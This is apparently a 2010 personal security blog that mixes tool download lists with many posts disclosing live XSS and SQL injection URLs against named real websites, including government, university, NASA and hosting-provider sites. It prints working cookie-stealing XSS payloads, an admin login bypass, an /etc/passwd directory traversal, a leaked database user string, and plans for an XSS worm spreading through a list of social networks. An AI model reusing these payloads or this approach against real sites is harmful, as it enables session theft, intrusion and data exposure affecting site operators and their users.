 RootQuest (dead link) - http://comsentry.com/files/RootQuest_v1.exe
 RootQuest (mirror) - http://www.kernelmode.info/ARKs/RootQuest_v1.rar
 RootRepeal - http://rootrepeal.googlepages.com/RootRepeal.rar
 Safe'n'Sec Personal Pro + Rootkit Detector - http://www.safensoft.com/sns/snsrd_eng.exe
 SafetyCheck 1.7 - http://yyuyao.googlepages.com/SafetyCheck1.7Beta.rar
 SanityCheck 2.00 - http://www.resplendence.com/download/sanitySetup.exe
 Sophos Antirootkit - http://www.sophos.com/products/free-tools/sophos-anti-rootkit/download/
 Stealth MBR Rootkit Detector - http://www2.gmer.net/mbr/mbr.exe
 SysProt Antirootkit - http://sites.google.com/site/sysprotantirootkit/Home/SysProt.zip?attredirects=0&d=1
 SysReveal - http://www.sysreveal.com/download/SysReveal.zip
 TDSS Remover - http://www.esagelab.com/files/tdss_remover_latest.rar
 Tizer Rootkit Razor - http://www.tizersecure.com/freedownloads/Tizer%20Rootkit%20Razor%20Setup.msi
 TrendMicro RootkitBuster - http://www.trendmicro.com/ftp/products/rootkitbuster/RootkitBuster_2.80.1077.zip
 VBA32 Antirootkit - ftp://vba.ok.by/vba/beta/Vba32arkit_beta.zip
 XueTr - http://xuetr.com/download/XueTr.zip
 YasKit 1.223 - http://qzdx.kafan.cn/down1//AntiSpyWare/2009/YasKit1.223.rar
 YasKit 1.223 (mirror) - http://www.kernelmode.info/ARKs/YasKit1.223.rar




Ref: kernelmode.info

Sunday, 18 April 2010

rot13 party | XSS forms

Ok ... now with the rot13


string
 </textarea><script>alert(document.cookie);</script><textarea>
encoded
 </grkgnern><fpevcg>nyreg(qbphzrag.pbbxvr);</fpevcg><grkgnern>
------------------------------------------
sites with raw post


http://www.rot13.com/index.php
text=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://rot13-encoder-decoder.ewebdev.com/
plain_text_for_rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%281%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E




http://authors.aspalliance.com/brettb/ROT13EncodingWithASP.asp
ROT13=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&B1=Encode%2FDecode+ROT13


http://www.retards.org/projects/rot13/
rotme=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://edoceo.com/utilitas/rot13
in=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&cmd=ROT13


http://geekgirl.dk/stuff/rot13.html
intext=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://mcraigweaver.com/rot13.php
raw=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&cooked=&Rotate=Rotate+it.


http://doug.finalownage.com/tools/rot13.php
rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://www.geomatics.ca/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=Encrypt+%2F+Decrypt&submitted=yes


http://spectraldesign.net/rot13.php
rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&convert=ROT-13


http://lowkeysoft.com/LostARG/rot13.php
decoding=true&code=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&submit=Decode




http://www.toms-geocache.de/Werkzeuge/rot13.php?txtROT13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&btnCoder=kodieren


http://www.lasoft.cz/gc/hw/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=%C5%A0ifruj+%2F+de%C5%A1ifruj


http://www.viruscom2.com/web-app/encode-decode-ROT13.php
textCode=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=Encode-Decode+Now%21%21%21


http://www.nwhtweb.com/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://kamil.eu.org/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E




------------------------------------------------
Urg .... most of them are repetitive and too simple. 

sourcecodesworld.com - givemethecode.com | XSS SQL Injection



asp/mysql SQL INJ
http://www.sourcecodesworld.com/showScriptSite.asp?ScriptId=459




XSS (back from google?)
http://www.sourcecodesworld.com/search.asp?domains=www.sourcecodesworld.com%3Bwww.givemethecode.com&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&sa=Google+Search&sitesearch=www.sourcecodesworld.com&client=pub-6213915329796065&forid=1&channel=7633136160&ie=ISO-8859-1&oe=ISO-8859-1&cof=GALT%3A%23995500%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3AB00C00%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A004F23%3BALC%3AB00C00%3BLC%3AB00C00%3BT%3A000000%3BGFNT%3A000000%3BGIMP%3A000000%3BLH%3A50%3BLW%3A313%3BL%3Ahttp%3A%2F%2Fwww.sourcecodesworld.com%2Fimages%2Flogo.gif%3BS%3Ahttp%3A%2F%2Fwww.sourcecodesworld.com%3BFORID%3A11&hl=en


XSS

http://www.givemethecode.com/sign.asp?returnURL=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22http://www.givemethecode.com/source/view-my-source.asp

http://base64-decode.php-functions.com/ | XSS

The idea is to use any data to decode (base64 in this case) and see if we can inject the xss.


http://base64-decode.php-functions.com/

other websites



http://www.motobit.com/util/base64-decoder-encoder.asp
http://www.shell-tools.net/index.php?op=base64_dec






We need to submit this string base64 encoded
 -------------------------------------------------------------
<html><head></head><body></textarea><script>alert(document.cookie);</script><textarea></body></html>
  -------------------------------------------------------------
PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjwvdGV4dGFyZWE+PHNjcmlwdD5hbGVydChkb2N1bWVu
dC5jb29raWUpOzwvc2NyaXB0Pjx0ZXh0YXJlYT48L2JvZHk+PC9odG1sPg==
 -------------------------------------------------------------


Note: The <textarea> tags are useless in this case but are working in the 90% of other similar cases that are showing the results in a textarea.


a different one with text input
 http://nc-designs.co.uk/tools/Base64 Encryption and Decryption/
----------------------------------------
"><script>alert(document.cookie);</script><"
----------------------------------------
Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ+PCI=


----------------------------------------


I've found another base64 decoder more trivial. with a few differences.
http://www.toastedspam.com/decode64
- it doesn't decode correctly the data
- it tries to remove/convert with some html entities <>


I've spent about ten minutes (sic) to achieve this XSS




The string to convert (b=a; is garbage to have a good string without random characters after decoding)
a=document.cookie; b=a; alert(a); 
The converted string
YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7





When we submit the data we should use tamper data (or firebug to change the html) and
change disp with script (disp=script) 


text=YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7&disp=script



tobu.co.jp | xss

the tobu railway in japan.


http://www.tobu.co.jp/transit_fare/?link=http://eki.tobu.co.jp/norikae/pc/N3?USR=PC&sf=1735-%91%e5%98a%93c&st=2319-%90V%8b%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22%cb%90%b6&sr=0&pn=3&rp=0&tp=0&ep=1&date=2'0100418&time=0910

www.normateneo.unibo.it | xss

simple
http://www.normateneo.unibo.it/NormAteneo/default.htm?search=0&view=1&PageNumber=1&textToSearch=%22%3e%3cscript%3ealert(document.cookie)%3b%3c%2fscript%3e%3c%22

Saturday, 17 April 2010

turkstat.gov.tr | XSS - sys compromise

http://www.turkstat.gov.tr/kp/kullanici/forgotPassword.do?reqCode=pre%3Cscript%3Ealert(1);%3C/script%3EpareForgotPasswordForm

tehran.gov.ir | sql injection - XSS - system compromise


Set free all the political captives, all the human rights activists.
The Iranian  Government should think about the internal problems instead of arguing about anything.
Iran and the Usa MUST stop all the Atomic Programs.
The new Iran must be laic, with the freedom to choose your religion, peaceful and without any kind of violence!

Equal rights for the women! 
Stop the violences!
------------------------------------------------------------------------- 



there are for sure other xss and sql injections.

several sql injections in NewsId
http://www.tehran.gov.ir/new/Default_view.asp?NewsId=13892


XSS in name (
http://www.tehran.gov.ir/new/Default_Services.asp?chid=17&name=<script>alert(document.cookie);</script>


The system could be compromised (windows box) and get the source code due to a misconfiguration.
You can download the source code here. 

Friday, 16 April 2010

Watch youtube with opera browser - "GO UPGRADE!"

Youtube have update the website practically kicking the butt of the opera browser's users with the permanent message  "GO UPGRADE!".

There's a workaround to fix this issue!
Just install this user javascript file


Before anything, if you've not done it before, you must create the folder for the scripts (I suggest a folter within the opera application folder ... if you want in the applcation data).
I've used "%programfiles%\Opera\JS"
Put this javascript in the folder. -click here-

( copyright 2010, Snap )
After that go into opera and click on File->preferences->Advanced->Content->Javascript Options
select the User Javascript folder.


Reference: http://extendopera.org/userjs/content/youtube-protection-remover 

mail.com | xss, possible phishing/spam


http://web.mail.com/31423-111/mmc-2/en-us/common/error.aspx?code=80070002žscriptualert(EXSSE)ž/scriptu&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=30530-web-20100416-201528&rt=STANDARD#x0D;ascript:alert(%27myxss%27);%22%3E&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=anything&rt=STANDARD


base url: http://web.mail.com/
31423-111 - can be anything (url rewriting??)
mmc-2/ - can be anything (url rewriting??)
en-us - can be anything (url rewriting??). This should set the language.
common -  - can be anything (url rewriting??)



A funny joke XD (for me)
http://web.mail.com/31423-111/mmc-2/en-us/common/error.aspx?code=80070002&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=You need to buy a new computer&rt=STANDARD

europa.eu - xpath injections

europa.eu is mainly based on cold fusion and Oracle as dbms (via jdbc)
The main website is probably proxied via http://yakima.cc.cec.eu.int:6085  (I'm not able to clearly understand all the errors from coldfusion)


------link removed as requested------

I cannot publish the url but it's easy to spot (in my opinion).

Note: A few hours with a fuzzer can give you good results.
-------

usa.gov | xss, remote code execution

Talibans could attack the usa's website too :) lol.

I don't want to offend anybody ... it's just to say something funny.
And I've warned the tech support instead of defacing the website as someone else could have done for a lot of popularity.



http://answers.usa.gov/cgi-bin/gsa_ict.cfg/php/enduser/chat.php


sample
"><script>alert(document.cookie);</script><"


with a more elaborated (external) script you can create a phishing page with a different chat.
With a bit of social engineering and an external script (my post2get.php ?) you can even grab the cookies.
I've already grabbed a session id but without luck (I don't know the administrative/login/authentication pages (and I don't want to know them 8) ).




Remote code execution. Input is not sanitized.








As a proof I've contacted them via the (same) chat.
-----------------------------------------------------------
Karessa G.: Hi, my name is Karessa G.. How may I help you?
walter : hello
walter : are you human or a bot?
Karessa G.: I am a real person. How may I help you today?
walter : Ok. I'm not american. Anyway you've a small problem with this chat. Malicious persons can gather sensitive informations about the users session via XSS (cross site scripting). This is quite important for your security (I suppose). If you can send this information to the technical staff.
Karessa G.: One of our staff members, Jacob Parcell, is the best resource to answer your inquiry. Please e-mail him with your questions and he will be happy to answer them. His e-mail address is jacob.parcell@gsa.gov.
Karessa G.: I hope you find this information helpful. Do you have any other questions?
walter : I don't need an answer. It's your problem. Anyway I will send him an email.
Karessa G.: Thank you.
walter : Have a nice day :)
Karessa G.: You too.
Karessa G.: Thank you for contacting USA.gov. We would like your feedback on our performance. You can let us know what you think by visiting  http://www.info.gov/NCCsurvey.htm You may need to copy and paste that link into your browser's address bar.
-----------------------------------------------------------


After that I've sent the email.

They have replied after about 3 days. They are checking the problems right now.

provincia.benevento.it - directory traversal - sql injections - remote code execution

Yes ... "you are so cool" phpnuke was not so cool. :)
http://www.provincia.benevento.it/?name=Search&file=../../../../../../../../../etc/passwd

php-stats remote execution in admin.php| sql injections
http://www.provincia.benevento.it/stats/

INPS - xss, spam/phishing, sql injection, CSRF, users' data access(no auth)

Possible spam/phishing


http://www.inps.it//newportal/default.aspx?txtNumero=%22%3Epassword:%20%3Cinput%20type=%22text%22%3E%3Cinput%20type=%22submit%22%3E%3C%22&txtTesto=%20test%3E&undefined=TROVA&sTrova=ultime%20circolari&sCategoria=3&cboAnno=Abc123&cboDal=Abc123&cboAl=Abc123&cboOrdina=Data%20crescente#02067624055715922812
http://www.inps.it//newportal/default.aspx?txtNumero=2&txtTesto=%20rantolo">%3E&undefined=TROVA&sTrova=ultime%20circolari&sCategoria=3&cboAnno=Abc123&cboDal=Abc123&cboAl=Abc123&cboOrdina=Data%20crescente#02067624055715922812
http://www.inps.it//newportal/default.aspx?txtNumero=2&txtTesto=%20rantolo">%3E&undefined=TROVA&sTrova=ultime%20circolari&sCategoria=3&cboAnno=Abc123&cboDal=Abc123&cboAl=Abc123&cboOrdina=Data%20crescente#02067624055715922812
http://www.inps.it//newportal/default.aspx?txtNumero=2&cboAnno=&cboDal=%22%3E1979&cboAl=2011&txtTesto=+rantolo&cboOrdina=%27data%26sortdirection%3Ddesc&x=61&y=-1&sTrova=%22%3E%3Ca%20href=http://www.google.com%3E%3Ch3%3Egoogola%3C/h3%3E%3C/a%3E%3Cdiv%20style=%22width:%20900px;%22id=%22a&sCategoria=3


Poems can be fun (spam)
http://www.inps.it/Modulistica/compila.asp?idArea=2&AreaDesc=La%20donzelletta%20vien%20dalla%20campagna,In%20sul%20calar%20del%20sole,Col%20suo%20fascio%20dell'erba;%20e%20reca%20in%20manoUn%20mazzolin%20di%20rose%20e%20di%20viole,Onde,%20siccome%20suole,Ornare%20ella%20si%20apprestaDimani,%20al%20d%EC%20di%20festa,%20il%20petto%20e%20il%20crine.Siede%20con%20le%20vicineSu%20la%20scala%20a%20filar%20la%20vecchierella,Incontro%20l%E0%20dove%20si%20perde%20il%20giorno;E%20novellando%20vien%20del%20suo%20buon%20tempo,Quando%20ai%20d%EC%20della%20festa%20ella%20si%20ornava,Ed%20ancor%20sana%20e%20snellaSolea%20danzar%20la%20sera%20intra%20di%20queiCh'ebbe%20compagni%20dell'et%E0%20pi%F9%20bella.Gi%E0%20tutta%20l'aria%20imbruna,Torna%20azzurro%20il%20sereno,%20e%20tornan%20l'ombreGi%F9%20d%E0%20colli%20e%20d%E0%20tetti,Al%20biancheggiar%20della%20recente%20luna.Or%20la%20squilla%20d%E0%20segnoDella%20festa%20che%20viene;Ed%20a%20quel%20suon%20direstiChe%20il%20cor%20si%20riconforta.I%20fanciulli%20gridandoSu%20la%20piazzuola%20in%20frotta,E%20qua%20e%20l%E0%20saltando,Fanno%20un%20lieto%20romore:E%20intanto%20riede%20alla%20sua%20parca%20mensa,Fischiando,%20il%20zappatore,E%20seco%20pensa%20al%20d%EC%20del%20suo%20riposo.Poi%20quando%20intorno%20%E8%20spenta%20ogni%20altra%20face,E%20tutto%20l'altro%20tace,Odi%20il%20martel%20picchiare,%20odi%20la%20segaDel%20legnaiuol,%20che%20vegliaNella%20chiusa%20bottega%20aa%20a,E%20s'affretta,%20e%20s'adopraDi%20fornir%20l'opra%20anzi%20il%20chiarir%20dell'alba.Questo%20di%20sette%20%E8%20il%20pi%F9%20gradito%20giorno,Pien%20di%20speme%20e%20di%20gioia:Diman%20tristezza%20e%20noiaRecheran%20l'ore,%20ed%20al%20travaglio%20usato




CSRF for the pin request
http://www.inps.it/newportal/default.aspx?sID=%3B0%3B&iMenu=2&ServAction=Richiesta+PIN+On+Line&iiDServizio=88&sURL=https%3A//servizi.inps.it/servizi/PinOnLine/Internet/




Bypassed the filter on the redirect
http://www.inps.it/bussola/VisualizzaDoc.aspx?iIDLink=&iIDDalPortale=&sExtURL=http://www.google.com/https%3A//servizi.inps.it/servizi/PinOnLine/Internet/


-errors ???????-
http://www.inps.it/newportal/default.aspx?sID=
http://www.inps.it/newportal/image.aspx?ImgID=
http://www.inps.it/bussola/GetPDFVersion.aspx?iIDItem=

policlinico umberto 1 - xss - sql injections

a fex xss
a possible sql injection (oracle dbms) in
http://www.policlinicoumberto1.it/PR_Item.asp

Municipio Roma 7 - XSS - SQL Injections - Possible System Compromise

simple sql inj to login in the admin area ( u: anything p: 'or' )
http://www.municipioroma7.it/damailinglist/admin_cp.asp


sql injection in Title
http://www.municipioroma7.it/?Page=News&Title=




Several other problems.

Comune roma - xss - possible spam and phishing

http://www.comune.roma.it/was/wps/portal/!ut/p/_s.7_0_A/7_0_6L3/.cmd/ad/.ar/sa.spf_ActionListener/.c/6_0_43I/.ce/7_0_SGH/.p/5_0_QUH?annoPubblicazione=&giornoScadenza=&method=searchValue&d-16544-p=3&testoLibero=&spf_strutsAction=%212fhomeAlbp.do<img src="http://www.google.it/images/nav_logo8.png">&giornoPubblicazione=&annoScadenza=&meseScadenza=&provvedimento=-1&mesePubblicazione=&isDisplayTagCall=true&proponente=-1&isDisplayTagCall=true

http://www.comunebn.it Comune Benevento | XSS - sql injection - outdated webserver - possible root compromise

#cat /proc/version
Linux version 2.6.15-1.2054_FC5smp (bhcompile@hs20-bc1-3.build.redhat.com)
(gcc version 4.1.0 20060304 (Red Hat 4.1.0-3)) #1 SMP Tue Mar 14 16:05:46 EST 2006


mysql user (from scripts): cvbIJC_

webroot path: /root/comune.bn/


No further info




XSS
http://www.comunebn.it/webcam_day/foto.php?ore=0%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E0
 

Steal the aol-cookies from the kids

An old xss.....


http://teens.aol.com/entertainment/celebrity-causes?photo=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

Unisannio - XSS and SQL Injections, leak of data, system compromise

There are several other bugs and It's always the same code.
A few samples.

http://www.unisannio.it/notizie/comunicati/viscom.php?id=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.unisannio.it/notizie/semconv/viscom.php?id=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.unisannio.it/notizie/seminari/viscom.php?id=

http://ing.unisannio.it/ects/scheda.php?1 - sql errors

-29/12/2011 Update-
After a 10 minutes spent on the website for fun I've tested that it's possible to run a shell  without a lot of problems, the system can be compromised and it's possible to get full administration privileges. The same goes for a few other boxes in the network ... no one is going to patch those computer even after mailing them about the problem.

My love for the nasa.

Long time ago.... The first time that I've found a xss on a nasa's website I've reported it to the webmaster .... it was so strange (for me) because *he* was a woman. She was clueless about what I was talking about (xss/sql injections .... bla bla).
Uh ..... as a gossip I can tell you that she was a beautiful woman .... I digged into her photos so I can still remember her.
But hey .... she was married and happy (I suppose) :).


This one ise new ... found just for fun right now.
http://robotics.nasa.gov/archive/robot_news.php?year=2005<script>alert(document.cookie);</script>

Those are so old that they don't even work anymore and some pages are not existing.

http://photojournal.jpl.nasa.gov/gallery/snt?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/gallery/universe?"><script>alert(123456)</script>
http://robotics.nasa.gov/rcc/redirect.php?url=%22%3E%3Cscript%3Ealert(123456)%3C/script%3E%3C/b
http://images.jsc.nasa.gov/search/search.cgi?textsearch=Go&hitsperpage=5&submit.x=11&submit.y=16&submit=submit&keywords=%3Cscript%3Ealert%28%27NotSec.com%27%29%3C%2Fscript%3E
http://photojournal.jpl.nasa.gov/target/Sun?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Mars?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Jupiter?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Venus?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Saturn?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Neptune?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Pluto?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/target/Other?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Earth?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Mercury?"><script>alert(123456)</script>
http://photojournal.jpl.nasa.gov/targetFamily/Uranus?"><script>alert(123456)</script>

XSS SQL Injections Aruba.it dump users data.

Those xss are very old too. There are also several sql injections and the possibility to admin several boxes in a control panel due to a bug (but I cannot and I don't want to add them). Those are *just* xss.


http://www.aruba.it/listino.asp?id=/%22%3E%22%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://rivenditori.aruba.it/riv/start.asp?Msg=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://hosting.aruba.it/domini/nodata.asp?Msg=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://hosting.aruba.it/?lang=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://keyposition.aruba.it/scegli.asp?kvu=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E


Reuters doesn't read my emails

I've sent some time ago (more than 2 years? I cannot remember) an email regarding the xss on their (reuters) website. I've not tested other things as much as I can remember but there are a couple of other small bugs.

http://www.reuters.com/search?blob=%22%3B%3E%3C%2Fnoscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

Eures data open to the world. I'm still waiting for a fix.

There are several XSS, a few CSRF etc. on the eures' website.
A sample
http://ec.europa.eu/eures/main.jsp?acro=faq%22%%3C/script%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C&lang=it&catId=489&parentId=0
Even a kid could identify them.
The cookie EURES_SESSIONID can also be (ab)used for other particular things.
You can also impersonate the administrator (maybe I will add an example when they will solve those issues).

Anyway..... I'm still waiting their fix for the pdf/doc generation of the curriculum vitae (about a year have passed since my request for support).
Theorically it's a good service ..... when it works ..... even if I've never used anything except the curriculum generation.

Ikea Home Planner Portable

Ikea Home Planner Portable

"Become your own interior designer with the help of the IKEA Planner Tools. Drag and drop your choice of furniture into the room and fit them to the exact measurements of your home. Rearrange and try different styles until you’re satisfied with the result. View it in 3-D and print with all the measurements, just like an architect. See how much it will cost and get the list of all products."


Ikea Home Planner Portable


The portable version of Microsoft Baseline Security Analyzer 2.1.1

The portable version of Microsoft Baseline Security Analyzer 2.1.1 

"The Microsoft Baseline Security Analyzer provides a streamlined method to identify missing security updates and common security misconfigurations. MBSA 2.1.1 is a minor upgrade to add support for Windows 7 and Windows Server 2008 R2."




Download Microsoft Baseline Security  from sharebee (Megaupload, Rapidshare, zshare, etc)

The portable version of Goolag Scanner

 The portable version of Goolag Scanner
"The Goolag Scanner is a tool that has been released by the Cult of the Dead Cow to automate Google hacking using 1,500 predefined search queries."
Goolag Scanner Portable

P.S. I don't use this tool.

Firefox Portable WebTools

A Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc.

Firefox Portable WebTools

This is an old patch for the latest version of urchin 5 that is no longer supported.

Fix for Urchin 5.703

This is quite old so I don't know  if it covers all the bugs but for sure most of the xss and apache bugs have been solved.


batch scripting carriage return head request

I've spent a bit of time to understand how to get a carriage return with a batch script. Anyway this simple batch is useless ... an HEAD HTTP request with netcat.
gethead.bat




@echo OFF
if not exist "%set_path_root%bin\nc.exe" goto :NONETCAT
set HTTPHOST=%1
if "%HTTPHOST%" == "" goto :HELP
set HTTPPORT=%2
if "%HTTPPORT%" == "" set HTTPPORT=80
set HTTPHEADREQ=HEAD / HTTP/1.0
echo %HTTPHEADREQ% >httpreqfiledata.tmp
echo. >>httpreqfiledata.tmp
nc %HTTPHOST% %HTTPPORT% < httpreqfiledata.tmp


del httpreqfiledata.tmp
GOTO :END


:NONETCAT
echo please make sure that necat is available
goto END
:HELP
echo ------------------------------
echo usage: gethead hostname [port]
echo ------------------------------
:END



Advertising networks for socialnetworks


http://www.mochimedia.com/
http://rockyou.com/
http://www.myofferpal.com/
http://www.tattomedia.com/
http://srpoints.com/

Facebook Development Resources

Thursday, 15 April 2010

list of the social networks

I've put up a list of the most common social networks to implement them in an automatic (theory and not practice) xss based worm with specific "code" download . (xmlhttprequests are quite always not working  .... with the java class it's working on any platform but it's suspicious and the users are warned).
(5 s.n. are working. Spread limit to 10 users per network)

Anyway, this is the list of the social networks, some useful sites and the refeferences.


-------------------------------------------------------------------
-References-
http://en.wikipedia.org/wiki/List_of_social_networking_websites
http://socialnetworklist.com
-------------------------------------------------------------------


-write to several social networks in one time-
http://ping.fm/
http://hellotxt.com/
-------------------------------------------------------------------
-Social Networks-
anobii.com
badoo.com
facebook.com
linkedin.com
mixi.jp
myspace.com
orkut.com
viadeo.com
netlog.com
habbo.com
skyrock.com
jaiku.com
US Intelligence Community A-Space
twitter.com
jaiku.com
identi.ca
hi5.com
flickr.com
del.icio.us
koornk.com
peoplesound.com
bebo.com
blip.fm
blip.pl
brightkite.com
buboo.tw
buzzherd.com
digu.com
fanfou.com (bugged - actually dead)
fazkut.com
facebook.com
feecle.jp (always down from europe)
frazr.com
friendfeed.com
friendster.com
gozub.com
hictu.com
jaiku.com
jisko.net
jiwai.de
khaces.com
kwippy.com
laconi.ca
meemi.com
mexicodiario.com
multiply.com
ning.com
numpa.com
wiserearth.org
plaxo.com
plerb.com
plurk.com
posterous.com
seesmic.com
shoutem.com
skyrock.com
socialmedian.com
tuenti.com
tumblr.com
12seconds.com
utterli.com
yammer.com
yelp.com
youare.com
xt3.com
zuosa.com
diigo.com
zoo.gr


-------------------------------------------------------------------

Sunday, 4 April 2010

Online antivirus check tools list

This is a list of online Virus, Malware, Trojan Scanners for Trojans, Backdoors, Worms, Dialers, Spyware/Adware, Keyloggers, Rootkits, Hacking Tools, Riskware, TrackingCookies, Virii, Viruti, Virus, Sniffers, Trojan/Droppers, Troj/Crypt.




Scan uploaded files individually using multiple anti-virus engines
All antivirus softwares - AhnLab (V3), Aladdin (eSafe), ALWIL (Avast! Antivirus), Authentium (Command Antivirus), Avira (AntiVir), Bit9 (FileAdvisor), Cat Computer Services (Quick Heal), ClamAV (ClamAV), CA Inc. (Vet), Doctor Web, Ltd. (DrWeb), Eset Software (NOD32), ewido networks (ewido anti-malware), Fortinet (Fortinet), FRISK Software (F-Prot), F-Secure (F-Secure), Grisoft (AVG), Hacksoft (The Hacker), Ikarus Software (Ikarus), Kaspersky Lab (AVP), McAfee (VirusScan), Microsoft (Malware Protection), Norman (Norman Antivirus), Panda Software (Panda Platinum), Prevx (Prevx1), Secure Computing (Webwasher), Softwin (BitDefender), Sophos (SAV), Sunbelt Software (Antivirus), Symantec (Norton Antivirus), UNA Corp/Antidote (UNA), VirusBlokAda (VBA32) and VirusBuster (VirusBuster)


http://virusscan.jotti.org/
http://www.virustotal.com/
http://virscan.org/
http://www.viruschief.com/
http://www.filterbit.com/
http://scanner.virus.org/

http://scanner.novirusthanks.org/
----------------------------------------
Single file scanners (single engine?)
Dr.Web
http://online.drweb.com/?url=1 
Avast Online Scanner 
http://onlinescan.avast.com 
Kaspersky Virus File Scanner
http://www.kaspersky.com/scanforvirus
Fortinet FortiGuard Online Virus Scanner 
http://www.fortiguardcenter.com/antivirus/virus_scanner.html
ThreatExpert Free Online File Scanner
http://www.threatexpert.com/filescan.aspx 
Surfright Online malware analysis 
https://www.webimmune.net/default.asp
Norman Sandbox Information Center Analysis 
http://www.norman.com/microsites/nsic/Submit/en
Anubis: Analyzing Unknown Binaries
http://anubis.iseclab.org/index.php 

JoeBox 
http://www.joebox.org/submit.php 

Microsoft Malware Protection Center
https://www.microsoft.com/security/portal/submit.aspx
Sunbelt Malware Sandbox
http://research.sunbelt-software.com/Submit.aspx
ClamAV Online Specimen Scanner 
http://www.gietl.com/test-clamav/ 
----------------------------------------


Online real-time antivirus (single engine)
Kaspersky Online Virus Scanner 
http://www.kaspersky.com/virusscanner
Panda ActiveScan
http://www.pandasecurity.com/activescan/index/ 

CA eTrust Virus Scanner 
http://www.ca.com/us/securityadvisor/virusinfo/scan.aspx 

Virus Chaser for Web 
http://www.viruschaser.com/enwi/4_01.jsp 

BitDefender Online Scanner 
http://www.bitdefender.com/scan8/ie.html
Trend Micro HouseCall 
http://housecall.trendmicro.com/ 

ESET Online Scanner 
http://www.eset.com/onlinescan/ 

Symantec Security Check
http://security.symantec.com/sscv6/home.asp?langid=ie&venid=sym&plfid=24&pkj=RHLFXZDNNXGEQGGYYFK
Ewido (AVG) Online Spyware Scanner
http://www.ewido.net/en/onlinescan/
A-squared Web Malware Scanner
http://www.emsisoft.com/en/software/ax/?scan=1 (http://www.emsisoft.com/en/software/ax/?scan=1)

ArcaBit Online Scanner 
http://arcaonline.arcabit.com/scanner.html 

McAfee FreeScan 
http://us.mcafee.com/root/mfs/scan.asp?affid=56
